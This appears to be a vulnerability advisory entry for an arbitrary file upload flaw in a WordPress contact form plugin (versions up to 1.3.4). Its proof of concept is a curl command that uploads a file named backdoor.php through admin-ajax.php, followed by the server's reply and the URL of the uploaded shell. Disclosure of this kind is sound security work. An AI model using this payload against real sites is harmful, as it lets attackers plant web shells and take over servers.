Lucene search
Claudio VivianiWPVDB-ID:1A370EFB-194C-4762-B06D-79B3BF02E90FHistoryApr 12, 2015 - 12:00 a.m.
N-Media Website Contact Form with File Upload <= 1.3.4 - Arbitrary File Upload
2015-04-1200:00:00
Claudio Viviani
wpscan.com
8
The “upload_file()” ajax function is affected from unrestricted file upload vulnerability.
PoC
curl -k -X POST -F “action=upload” -F “Filedata=@./backdoor.php” -F “action=nm_webcontact_upload_file” http://www.example.com/wp-admin/admin-ajax.php Response: {“status”:“uploaded”,“filename”:“1427927588-backdoor.php”} http://www.example.com/wp-content/uploads/contact_files/1427927588-backdoor.php